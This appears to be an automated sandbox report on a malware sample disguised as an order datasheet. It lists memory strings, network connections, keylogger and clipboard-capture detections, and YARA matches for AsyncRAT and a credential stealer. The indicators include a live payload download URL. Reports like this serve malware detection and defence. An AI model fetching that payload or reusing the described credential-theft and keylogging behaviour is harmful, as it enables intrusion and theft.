Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1698610412.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.1698610412.0000000007894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: RegSvcs.exe, 00000003.00000002.1990031918.0000000007749000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1990031918.000000000773F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1988664588.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RegSvcs.exe, 00000003.00000002.1990031918.0000000007749000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1990031918.000000000773F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1988664588.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: ORDERDATASHEET#PO8738763.scr.exe, ORDERDATASHEET#PO8738763.scr.exe.0.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: ORDERDATASHEET#PO8738763.scr.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000002.1648217605.00007FF7BD73B000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: ORDERDATASHEET#PO8738763.scr.exe, ORDERDATASHEET#PO8738763.scr.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: ORDERDATASHEET#PO8738763.scr.exe, ORDERDATASHEET#PO8738763.scr.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000004.00000002.1694419298.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1717816114.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789776531.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: RegSvcs.exe, 00000003.00000002.1992384164.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegSvcs.exe, 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.00000000029A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csg-app.com
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csg-app.com/yak/build.exe
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1750061142.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.0000000004B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1696914668.0000000005E6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725374615.0000000005FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1762039748.000000000542A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1808922395.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.154.156.233:443 -> 192.168.2.4:49741 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, oLc2o0dpx.cs	.Net Code: sl5
Source: 3.2.RegSvcs.exe.73c0000.2.raw.unpack, JovGVW.cs	.Net Code: EHptgwtSX2v

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.7330000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.73c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.73c0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ORDERDATASHEET#PO8738763.scr.exe

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6238B0	0_2_00007FF7BD6238B0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6221B0	0_2_00007FF7BD6221B0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD60D620	0_2_00007FF7BD60D620
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD603EF0	0_2_00007FF7BD603EF0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD5FB6F0	0_2_00007FF7BD5FB6F0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD5F6ED0	0_2_00007FF7BD5F6ED0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD611D60	0_2_00007FF7BD611D60
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD602080	0_2_00007FF7BD602080
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD62E8E0	0_2_00007FF7BD62E8E0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6258C0	0_2_00007FF7BD6258C0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD61C0A0	0_2_00007FF7BD61C0A0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD5FBF90	0_2_00007FF7BD5FBF90
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6A7F40	0_2_00007FF7BD6A7F40
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6267E0	0_2_00007FF7BD6267E0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD61C7D0	0_2_00007FF7BD61C7D0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6117B4	0_2_00007FF7BD6117B4
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD609A90	0_2_00007FF7BD609A90
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD624B10	0_2_00007FF7BD624B10
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD5F82D0	0_2_00007FF7BD5F82D0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6102A0	0_2_00007FF7BD6102A0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD603130	0_2_00007FF7BD603130
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6081F0	0_2_00007FF7BD6081F0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6231E0	0_2_00007FF7BD6231E0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD5F39D0	0_2_00007FF7BD5F39D0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD6271B0	0_2_00007FF7BD6271B0
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD625490	0_2_00007FF7BD625490
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD616C90	0_2_00007FF7BD616C90
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD61BC80	0_2_00007FF7BD61BC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_027F1610	3_2_027F1610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D18778	3_2_06D18778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D1B4CB	3_2_06D1B4CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D14DA0	3_2_06D14DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D1C3E8	3_2_06D1C3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D38BE0	3_2_06D38BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D34C40	3_2_06D34C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D39B28	3_2_06D39B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D434A0	3_2_06D434A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D468D3	3_2_06D468D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0345B4A0	4_2_0345B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0345B490	4_2_0345B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_089F3A98	4_2_089F3A98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EAB490	7_2_04EAB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EAB470	7_2_04EAB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EAC64F	7_2_04EAC64F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EA136A	7_2_04EA136A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EA1D6A	7_2_04EA1D6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04EA1D08	7_2_04EA1D08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08F03E98	7_2_08F03E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0415B498	9_2_0415B498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0415B491	9_2_0415B491
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0415B488	9_2_0415B488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08153AA8	9_2_08153AA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0495B490	11_2_0495B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0495B470	11_2_0495B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08983A98	11_2_08983A98

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Code function: String function: 00007FF7BD5FDBD0 appears 64 times

Source: ORDERDATASHEET#PO8738763.scr.exe	Binary or memory string: OriginalFilename vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBTC_XClient.exe4 vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000002.1645833352.000001E84FB40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePublicKeyUnspecifiedTypeSize.dllZ vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000002.1646116418.000001E854006000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePublicKeyUnspecifiedTypeSize.dllZ vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000000.1636166218.00007FF7BD840000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePublicKeyUnspecifiedTypeSize.dllZ vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe, 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBTC_XClient.exe4 vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe	Binary or memory string: OriginalFilenamePublicKeyUnspecifiedTypeSize.dllZ vs ORDERDATASHEET#PO8738763.scr.exe
Source: ORDERDATASHEET#PO8738763.scr.exe.0.dr	Binary or memory string: OriginalFilenamePublicKeyUnspecifiedTypeSize.dllZ vs ORDERDATASHEET#PO8738763.scr.exe

Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.7330000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.73c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.73c0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
